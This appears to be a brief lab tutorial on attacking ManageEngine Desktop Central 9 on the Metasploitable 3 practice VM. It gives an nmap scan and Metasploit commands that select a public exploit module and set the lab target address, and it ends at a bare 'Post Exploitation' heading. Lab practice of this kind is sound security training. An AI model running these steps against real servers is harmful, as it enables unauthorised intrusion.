Metasploitable 3 – Exploiting Manage Engine Desktop Central 9


In this tutorial, I will be demonstrating some basics for Metasploit against Manage Engine Desktop Central 9. MEDC9 is installed on Metasploitable3 by default.

NMAP Scan

nmap -sV -p- 192.168.2.66

Manage Engine Website


Website Login


Finding Exploit


Metasploit



Once we are in Metasploit, we can search for “fileuploadservlet” which we found on the Exploit-DB website.

use exploit/windows/http/manageengine_connectionid_write show options

Now we need to select the exploit, and we can view the options that we need to configure.

set rhost 192.168.2.66 show options

With the exploit configured now, we can execute.


Post Exploitation